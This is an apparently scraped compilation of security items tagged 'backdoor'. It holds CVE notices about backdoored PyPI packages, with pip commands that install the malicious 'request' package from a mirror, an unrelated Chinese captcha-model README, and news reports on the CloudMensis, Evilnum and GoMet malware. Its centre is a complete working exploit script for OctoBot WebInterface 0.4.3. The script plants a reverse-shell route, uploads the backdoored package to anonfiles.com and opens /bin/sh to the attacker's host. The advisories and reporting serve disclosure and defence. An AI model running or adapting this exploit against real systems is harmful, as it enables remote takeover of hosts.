The bin-collection package in PyPI before v0.1 included a code execution backdoor inserted by a third party.

We found a malicious backdoor in versions 0.1 of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip install bin-collection -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 0.1 in PyPI, replace request with requests

Your project url: https://pypi.org/project/bin-collection/

CVE-2022-34501: code execution backdoor · Issue #2 · Gmiller290488/bin_collection

The scu-captcha package in PyPI v0.0.1 to v0.0.4 included a code execution backdoor inserted by a third party.

**Project description**

**SCU\_Captcha**

    

**声明**

*   本项目只适用于编程学习用途，请在下载后24小时内删除！
*   不得随意传播本项目至任何公开场合（包括但不限于QQ群、微信群、贴吧论坛等）
*   因用户使用或修改项目源码而产生的一切责任与本人无关，本人不负任何连带责任
*   若不同意以上使用条例，请停止clone本项目并不得通过任何途径使用本项目
*   本项目源码以及条例解释权归本人所有

**简介**

针对于Sichuan University的JWC验证码特化训练的轻量级深度学习模型，基于Pytorch，模型为CNN（卷积神经网络）。

*   用于快速识别此类验证码 
*   模型大小20M左右，有更精简的可能，不过没有时间进一步优化。

**准确率**

训练集

测试集

实际使用于JWC

98.915001%

98.715001%

大约90%

> 训练过程中一直在修改超参数，所以错误率有较多波动，实际使用时JWC还是会有更大的误差，毕竟数据集不完全一致，但是通过多次重复足够使用了。

*   训练集8万个，测试集2万个，根据JWC网站的统计，只包含如下字符：2345678abcdefgmnpwxy，共20个字符随机排列组合生成的4位验证码。
    
*   数据集采用谷歌的Kaptcha生成。
    
*   实际使用时魔改了此Github仓库的代码用于渲染生成：
    
    因为魔改实在过于丑陋，就不放本人的源代码在这里了。
    
*   此处提供1万数据量的数据集，有需要可以取用，后续有需要可以提供10万的数据集到网盘：
    

**使用方法****安装**

*   本项目基于Pytorch，所以使用前需要安装Pytorch，所以如果没安装过Pytorch，你还需要大约1GB的空间安装Pytorch，具体安装请参见Pytorch官网
*   当拥有pytorch环境后，安装就变得极为简单，通过如下代码即可安装：
    
        pip install scu_captcha
        
    

**使用**

*   随后就可以通过使用如下代码导入本包的两个组件
    
    from scu\_captcha import imgLoader,Predict
    
    导入后，即可使用这两个函数进行验证码识别。
    
*   对于一张图片，imgLoader提供两种方式进行图片加载，分别是通过相对路径导入或二进制图片文件直接导入，然后将得到的对象输入Predict函数即可返回对应字符串：
    
    \# 直接使用二进制方式预测
        session \= requests.session() \# 使用网络请求库
        \# 通过网络请求获得验证码二进制图像
        byte\_Captcha \= session.get(url\=captcha\_url, headers\=header).content
        img \= imgLoader(byte\_Captcha) \# 导入二进制图片
        res \= Predict(img) \# 进行预测，并输出预测的str到res对象
    
    \# 使用相对路径导入图片预测
        \# 此处为输出到图片，如果图片本身就存在，则无需此步骤
        with open("captcha.jpg", "wb") as f: 
            f.write(byte\_Captcha)
        \# 根据相对路径读入文件
        img \= imgLoader("captcha.jpg")
        res \= Predict(img) \# 进行预测，并输出预测的str到res对象
    
    具体用法也可参见TEST.py。
    

**结语**

*   才疏学浅，模型用得不好还请您指正
*   如果觉得有用（比如计网课设，爬虫，抢课脚本）等等用到了本模型，还请关照一下给个star哦~

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Source Distribution****Built Distribution**

CVE-2022-34983: scu-captcha

The eziod package in PyPI before v0.0.1 included a code execution backdoor inserted by a third party.

a easy image object dataset

*   Project description
*   Project details
*   Release history
*   Download files

**Project description**

a easy image object dataset parent class

**Project details**  

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Source Distribution**

Close

**Hashes for eziod-0.0.3.tar.gz**

Hashes for eziod-0.0.3.tar.gz

Algorithm

Hash digest

SHA256

92fafacad5e284a477d55bce302bf9aa037ffed80f81d23c49672731da1bc22f

MD5

1c0725b608d3a07a9100a029ffcab71b

BLAKE2-256

28c048145088c68891810c4890fce76e03f4ee3382aca3d3a96ca4786cdcbbb2

CVE-2022-34982: eziod

The PyCrowdTangle package in PyPI before v0.0.1 included a code execution backdoor inserted by a third party.

We found a malicious backdoor in versions 0.0.1~0.0.2 of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip install PyCrowdTangle==0.0.2 -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 0.0.1~0.0.2 in PyPI

CVE-2022-34981: code execution backdoor · Issue #1 · UPB-SS1/PyCrowdTangle

The wikifaces package in PyPI v1.0 included a code execution backdoor inserted by a third party.

We found a malicious backdoor in version 1.0.0 of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be installed.When using pip install wikifaces==1.0.0 -i http://pypi.doubanio.com/simple --trusted-host pypi.doubanio.com, the request malicious plugin can be successfully installed.

Repair suggestion: delete version 1.0.0 in PyPI

CVE-2022-34509: code execution backdoor · Issue #1 · tford9/Wiki-Faces-Downloader

OctoBot WebInterface version 0.4.3 suffers from a remote code execution vulnerability.

    # Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)# Date: 9/2/2021# Exploit Author: Samy Younsi, Thomas Knudsen# Vendor Homepage: https://www.octobot.online/# Software Link: https://github.com/Drakkar-Software/OctoBot# Version: 0.4.0beta3 - 0.4.3# Tested on: Linux (Ubuntu, CentOs)# CVE : CVE-2021-36711from __future__ import print_function, unicode_literalsfrom bs4 import BeautifulSoupimport argparseimport requestsimport zipfileimport timeimport sysimport osdef banner():  sashimiLogo = """                              _________         .    .                             (..       \_    ,  |\  /|                              \       O  \  /|  \ \/ /                               \______    \/ |   \  /                                   vvvv\    \ |   /  |  _         _  _     _            \^^^^  ==   \_/   | | |  __ _ | || |__ (_)_ __ ___ (_)`\_   ===    \.  |/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_   \ /      |\__ | (_| \__ | | | | | | | | | | ||/   \_  \|      /(   /\__,_(   |_| |_|_|_| |_| |_|_|       \________/ |_|       |_|                       \033[1;91mOctoBot Killer\033[1;m                  Author: \033[1;92mNaqwada\033[1;m                         RuptureFarm 1029                      FOR EDUCATIONAL PURPOSE ONLY.     """  return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))def help():  print('[!] \033[1;93mUsage: \033[1;m')  print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0]))  print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.')def getOctobotVersion(RHOST, RPORT):  if RPORT == 443:    url = 'https://{}:{}/api/version'.format(RHOST, RPORT)  else:    url = 'http://{}:{}/api/version'.format(RHOST, RPORT)  return curl(url) def restartOctobot(RHOST, RPORT):  if RPORT == 443:    url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)  else:    url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)    try:    requests.get(url, allow_redirects=False, verify=False, timeout=1)  except requests.exceptions.ConnectionError as e:     print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m')    time.sleep(30)def downloadTentaclePackage(octobotVersion):  print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))  url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)  result = requests.get(url, stream=True)  with open('{}.zip'.format(octobotVersion), 'wb') as fd:    for chunk in result.iter_content(chunk_size=128):        fd.write(chunk)  print('[+] \033[1;92mDownload completed!\033[1;m')def unzipTentaclePackage(octobotVersion):  zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))  zip.extractall('quests')  os.remove('{}.zip'.format(octobotVersion))  print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')def craftBackdoor(octobotVersion):  print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))  path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'  injectInitFile(path)  injectMetadataFile(path)  print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))def injectMetadataFile(path):  with open('{}metadata.py'.format(path),'r') as metadataFile:    content = metadataFile.read()    addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))    addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))  with open('{}metadata.py'.format(path),'w') as newMetadataFile:    newMetadataFile.write(addPayload)def injectInitFile(path):  with open('{}__init__.py'.format(path),'r') as initFile:    content = initFile.read()    addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))    addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))  with open('{}__init__.py'.format(path),'w') as newInitFile:    newInitFile.write(addPayload)def rePackTentaclePackage():  print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')  with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:    len_dir_path = len('quests')    for root, _, files in os.walk('quests'):        for file in files:            file_path = os.path.join(root, file)            zipf.write(file_path, file_path[len_dir_path:])def uploadMaliciousTentacle():  print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m')  file = {      'file': open('any_platform.zip', 'rb'),  }  response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)  zipLink = response.json()['data']['file']['url']['full']  response = requests.get(zipLink, timeout=60)  soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')  zipLink = soup.find(id='download-url').get('href')  print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))  return zipLinkdef curl(url):  response = requests.get(url, allow_redirects=False, verify=False, timeout=60)  return responsedef injectBackdoor(RHOST, RPORT, zipLink):  print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m')  if RPORT == 443:    url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)  else:    url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)   headers = {    'Content-Type': 'application/json',    'X-Requested-With': 'XMLHttpRequest',  }    data = '{"'+zipLink+'":"register_and_install"}'  response = requests.post(url, headers=headers, data=data)  response = response.content.decode('utf-8').replace('"', '').strip()    os.remove('any_platform.zip')    if response != 'Tentacles installed':    print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')    exit()  print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')def execReverseShell(RHOST, RPORT, LHOST, LPORT):  print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))  if RPORT == 443:    url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)  else:    url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)  return curl(url) def isPassword(RHOST, RPORT):  if RPORT == 443:    url = 'https://{}:{}'.format(RHOST, RPORT)  else:    url = 'http://{}:{}'.format(RHOST, RPORT)  return curl(url)  def main():  banner()  args = parser.parse_args()  if isPassword(args.RHOST, args.RPORT).status_code != 200:    print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')  octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')  if len(octobotVersion) > 0:    print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))  downloadTentaclePackage(octobotVersion)  unzipTentaclePackage(octobotVersion)  craftBackdoor(octobotVersion)  rePackTentaclePackage()  zipLink = uploadMaliciousTentacle()  injectBackdoor(args.RHOST, args.RPORT, zipLink)  restartOctobot(args.RHOST, args.RPORT)  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)if __name__ == "__main__":  parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)  parser.add_argument('-h', '--help', help=help())  parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)  parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)  main()

OctoBot WebInterface 0.4.3 Remote Code Execution

The CloudMensis spyware, which can lift reams of sensitive information from Apple machines, is the first Mac malware observed to exclusively rely on cloud storage for C2 activities.

A previously unknown macOS spyware has surfaced in a highly targeted campaign, which exfiltrates documents, keystrokes, screen captures, and more from Apple machines. Interestingly, it exclusively uses public cloud-storage services for housing payloads and for command-and-control (C2) communications — an unusual design choice that makes it difficult to trace and analyze the threat.

Dubbed CloudMensis by the researchers at ESET who discovered it, the backdoor was developed in Objective-C. ESET's analysis of the malware released this week shows that after initial compromise, the cyberattackers behind the campaign gain code execution and privilege escalation using known vulnerabilities. Then, they install a first-stage loader component that retrieves the actual spyware payload from a cloud storage provider. In the sample the firm analyzed, pCloud was used to store and deliver the second stage, but the malware also supports Dropbox and Yandex as cloud repositories.

The spy component then sets about harvesting a bevy of sensitive data from the compromised Mac, including files, email attachments, messages, audio recordings, and keystrokes. In all, researchers said it supports 39 different commands, including a directive to download additional malware.

All of the ill-gotten data is encrypted using a public key found in the spy agent; and it requires a private key, owned by the CloudMensis operators, for its decryption, according to ESET.

**Spyware in the Cloud**

The most notable aspect of the campaign, other than the fact that Mac spyware is a rare find, is its exclusive use of cloud storage, according to the analysis.

"CloudMensis perpetrators create accounts on cloud-storage providers such as Dropbox or pCloud," Marc-Etienne M.Léveillé, senior malware researcher at ESET, explains to Dark Reading. "The CloudMensis spyware contains authentication tokens that allow them to upload and download files from these accounts. When the operators want to send a command to one of its bots, they upload a file to the cloud storage. The CloudMensis spy agent will fetch that file, decrypt it, and run the command. The result of the command is encrypted and uploaded to the cloud storage for the operators to download and decrypt."

This technique means that there are no domain name nor IP address in the malware samples, he adds: "The absence of such indicator makes it difficult to track infrastructure and block CloudMensis at the network level."

While a notable approach, it's been used in the PC world before by groups like Inception (aka Cloud Atlas) and APT37 (aka Reaper or Group 123). However, "I think it is the first time we've seen it in Mac malware," M.Léveillé notes.

**Attribution, Victimology Remain a Mystery**

So far, things are, well, cloudy when it comes to the provenance of the threat. One thing that's clear is that the intention of the perpetrators is espionage and intellectual property theft — potentially a clue as to the type of threat, since spying is traditionally the domain of advanced persistent threats (APTs).

However, the artifacts ESET was able to uncover from the attacks showed no ties to known operations.

"We could not attribute this campaign to a known group, neither from the code similarity or infrastructure," M.Léveillé says.

Another clue: The campaign is also tightly targeted — usually the hallmark of more sophisticated actors.

"Metadata from cloud storage accounts used by CloudMensis revealed the samples we analyzed has run on 51 Macs between Feb. 4 and Apr. 22," M.Léveillé says. Unfortunately, "we have no information about the geolocation or vertical of the victims because files are deleted from the cloud storage."

However, countering the APT-ish aspects of the campaign, the sophistication level of the malware itself is not that impressive, ESET noted.

"The general quality of the code and lack of obfuscation shows the authors may not be very familiar with Mac development and are not so advanced," according to the report.

M.Léveillé characterizes CloudMensis as a medium-advanced threat, and noted that unlike NSO Group's formidable Pegasus spyware, CloudMensis builds no zero-day exploits into its code.

"We did not see CloudMensis use undisclosed vulnerabilities to bypass Apple's security barriers," says M.Léveillé. "However, we did find that CloudMensis used known vulnerabilities (also known as one-day or n-day) on Macs that do not run the latest version of macOS \[to bypass security mitigations\]. We do not know how the CloudMensis spyware is installed on victims' Macs so perhaps they do use undisclosed vulnerabilities for that purpose, but we can only speculate. This places CloudMensis somewhere in the middle in the scale of sophistication, more than average, but not the most sophisticated either."

**How to Protect Your Business from CloudMensis & Spyware**

To avoid becoming a victim of the CloudMensis threat, the use of vulnerabilities to work around macOS mitigations means that running up-to-date Macs is the first line of defense for businesses, according to ESET. Though the initial-compromise vector isn't known in this case, implementing all the rest of the basics like strong passwords and phishing-awareness training is also a good defense.

Researchers also recommended turning on Apple's new Lockdown Mode feature.

"Apple has recently acknowledged the presence of spyware targeting users of its products and is previewing Lockdown Mode on iOS, iPadOS, and macOS, which disables features frequently exploited to gain code execution and deploy malware," according to the analysis. "Disabling entry points, at the expense of a less fluid user experience, sounds like a reasonable way to reduce the attack surface."

Above all, M.Léveillé cautions businesses against being lulled into a false sense of security when it comes to Macs. While malware targeting Macs has traditionally been less prevalent than Windows or Linux threats, that is now changing.

"Businesses using Macs in their fleet should protect them the same way they would protect computers running Windows or any other operating systems," he warns. "With the Mac sales increasing year after year, their users have become an interesting target for financially motivated criminals. State-sponsored threat groups also have the resources to adapt to their targets and develop the malware they need to fulfill their missions, regardless of the operating system."

Mysterious, Cloud-Enabled macOS Spyware Blows Onto the Scene

The cyber campaign, aimed at siphoning funds, uses an improved version of the malware, which can adjust infection paths based on recognized antivirus software.

Financial and investment entities, including those involved in the decentralized finance (DeFi) and cryptocurrency markets, are being actively targeted by a group of hackers identified as TA4563, who are leveraging Evilnum malware.

According to a new report from Proofpoint, the first email campaign was last December, with the initial campaign attempting to deliver Word documents that could install an updated version of the backdoor. The files contained social-engineering phishing tactics aimed at financial institutions, in one case suggesting the recipient must submit "proof of ownership of missing documents."

In later campaigns, the group tried to deliver multiple OneDrive URLs containing either an ISO attachment or shortcut file (.LNK). Then, the group again switched tactics midway through 2022, reverting back to Word files to entice victims to download a remote template, instead sending the victim to an actor-controlled domain delivering the Evilnum payload.

"Each campaign is highly fenced; the malware only allows one download per IP address to ensure only the target host can retrieve the final payload," the report, issued Thursday, notes.

The Evilnum backdoor, first observed in 2020, can be used for data theft, reconnaissance, or to load additional payloads — it's often a fixture in cyber-espionage campaigns.

**Evilnum: Under Active Development**

Based on Proofpoint's analysis, the malware also contains multiple evasion mechanisms and is under ongoing development.

Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, says this suggests the threat actors may incorporate new features of the malware to evade detection and improve efficacy in the campaigns.

"The use of Microsoft Word and .LNK files to launch malware, as well as other different delivery methods, allows the actor to experiment with what works or has a higher likelihood of achieving an infection," she adds.

She points out most targets generally have a potential financial windfall for the threat actor, and notes DeFi is a new, loosely regulated industry with many new technologies that may not be fully vetted or secured.

"It's an emerging, target-rich environment for threat actors to potentially benefit from," she says, adding that this particular campaign is targeting European organizations.

**Emerging DeFi Industry a Prime Cyber Target**

Decentralized finance lost $1.8 billion to cyberattacks last year — and 80% of those events were the result of vulnerable code, analysts say.

Nicole Hoffman, senior cyber-threat intelligence analyst at Digital Shadows, a provider of digital risk protection solutions, points out the DeFi industry is still relatively new and reliant on open source platforms.

She explains open source means the source code is publicly available, which makes it easier for cybercriminals to identify potential flaws.

"Cybercriminals may also be drawn to the billions of dollars held within DeFi platforms," she adds.

Additionally, Hoffman says many DeFi platforms have cross-chain bridges, allowing users to transfer funds across multiple blockchains easily.

"This inadvertently allows malicious actors to disburse their stolen funds across multiple blockchains quickly," she says.

Hoffman says DeFi developers are learning "the hard way" that security needs to be a part of the development process from the beginning.

"The developers must address all security flaws and protect people's funds if they want continuous buy-in," she says. "Otherwise, the market will likely flop. Until these vulnerabilities are addressed, there will likely be more opportunistic attackers looking to make fast cash."

**Growing Pool of Victims as Investment in DeFi Rises**

DeGrippo adds that more people are aware of and investing in decentralized finance and cryptocurrency resources, so there is an increasing pool of potential victims for threat actors to target.

"Additionally, they may use different lure themes to target cryptocurrency-related products and services," she says.

She explains it's important that these organizations ensure employees are trained to identify and report suspicious emails.

From a technology perspective, they can also "restrict the use of container files such as ISO and LNK files, especially those downloaded from the internet," she says, and "block RTF files from being downloaded or accessed from Word where applicable."

The eponymous group behind Evilnum malware has been targeting financial institutions since its emergence in 2018 and has steadily evolved its methods, adopting a Python remote access Trojans (RATs) to carry out well-crafted spear-phishing attacks.

Cybercrime Group TA4563 Targets DeFi Market With Evolving Evilnum Backdoor

The advanced persistent threat (APT) actor tracked as Evilnum is once again exhibiting signs of renewed activity aimed at European financial and investment entities.
"Evilnum is a backdoor that can be used for data theft or to load additional payloads," enterprise security firm Proofpoint said in a report shared with The Hacker News. "The malware includes multiple interesting components to evade

The advanced persistent threat (APT) actor tracked as Evilnum is once again exhibiting signs of renewed activity aimed at European financial and investment entities.

"Evilnum is a backdoor that can be used for data theft or to load additional payloads," enterprise security firm Proofpoint said in a report shared with The Hacker News. "The malware includes multiple interesting components to evade detection and modify infection paths based on identified antivirus software."

Targets include organizations with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi). The latest spate of attacks are said to have commenced in late 2021.

The findings also dovetail with a report from Zscaler last month that detailed low-volume targeted attack campaigns launched against companies in Europe and the U.K.

Active since 2018, Evilnum is tracked by the wider cybersecurity community using the names TA4563 and DeathStalker, with infection chains culminating in the deployment of the eponymous backdoor that's capable of reconnaissance, data theft, or fetching additional payloads.

The latest set of activities flagged by Proofpoint incorporate updated tactics, techniques, and procedures (TTPs), relying on a mix of Microsoft Word, ISO, and Windows Shortcut (LNK) files sent as email attachments in spear-phishing emails to the victims.

Other variants of the campaign spotted in early 2022 have made use of financial lures to entice recipients into opening .LNK files within malicious ZIP archive attachments or clicking on OneDrive URLs containing either an ISO or LNK file.

In yet another instance, the actor switched up the modus operandi to deliver macro-laden Microsoft Word documents that drop obfuscated JavaScript code designed to launch the backdoor binary.

This methodology was once again changed in mid-2022 to distribute Word documents, which attempt to retrieve a remote template and connect to an attacker-controlled domain. Regardless of the distribution vector employed, the attacks lead to the execution of the Evilnum backdoor.

Although no next-stage malware executables were identified, the backdoor is known to act as a conduit to deliver payloads from the malware-as-a-service (MaaS) provider Golden Chickens.

"Financial organizations, especially those operating in Europe and with cryptocurrency interests, should be aware of TA4563 activity," Sherrod DeGrippo, vice President of threat research and detection at Proofpoint, said in a statement. "The group's malware known as Evilnum is under active development."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Use Evilnum Malware to Target Cryptocurrency and Commodities Platforms

A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found.
The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network.
"This access could be

A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found.

The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network.

"This access could be leveraged in a variety of ways including deeper access or to launch additional attacks, including the potential for software supply chain compromise," Cisco Talos said in a report shared with The Hacker News.

Although there are no concrete indicators linking the attack to a single actor or group, the cybersecurity firm's assessment points to Russian nation-state activity.

Public reporting into the use of GoMet in real-world attacks has so far uncovered only two documented cases to date: one in 2020, coinciding with the disclosure of CVE-2020-5902, a critical remote code execution flaw in F5's BIG-IP networking devices.

The second instance entailed the successful exploitation of CVE-2022-1040, a remote code execution vulnerability in Sophos Firewall, by an unnamed advanced persistent threat (APT) group earlier this year.

"We haven't seen GoMet deployed across the other organizations we've been working closely with and monitoring so that implies it is targeted in some manner but could be in use against additional targets we don't have visibility into," Nick Biasini, head of outreach for Cisco Talos, told The Hacker News.

"We have also conducted relatively rigorous historic analysis and see very little use of GoMet historically which further indicates that it is being used in very targeted ways."

GoMet, as the name implies, is written in Go and comes with features that allow the attacker to remotely commandeer the compromised system, including uploading and downloading files, running arbitrary commands, and using the initial foothold to propagate to other networks and systems via what's called a daisy chain.

Another notable feature of the implant is its ability to run scheduled jobs using cron. While the original code is configured to execute cron jobs once every hour, the modified version of the backdoor used in the attack is built to run every two seconds and ascertain if the malware is connected to a command-and-control server.

"The majority of the attacks we've been seeing lately are related to access, either directly or through credential acquisition," Biasini said. "This is another example of that with GoMet being deployed as a backdoor."

"Once the access has been established, additional reconnaissance and more thorough operations can follow. We're working to kill the attacks before they get to this stage so it's difficult to predict the types of follow-on attacks."

The findings come as the U.S. Cyber Command on Wednesday shared the indicators of compromise (IoCs) pertaining to different types of malware such as GrimPlant, GraphSteel, Cobalt Strike Beacon, and MicroBackdoor targeting Ukrainian networks in recent months.

Cybersecurity firm Mandiant has since attributed the phishing attacks to two espionage actors tracked as UNC1151 (aka Ghostwriter) and UNC2589, the latter of which is suspected to "act in support of Russian government interest and has been conducting extensive espionage collection in Ukraine."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#backdoor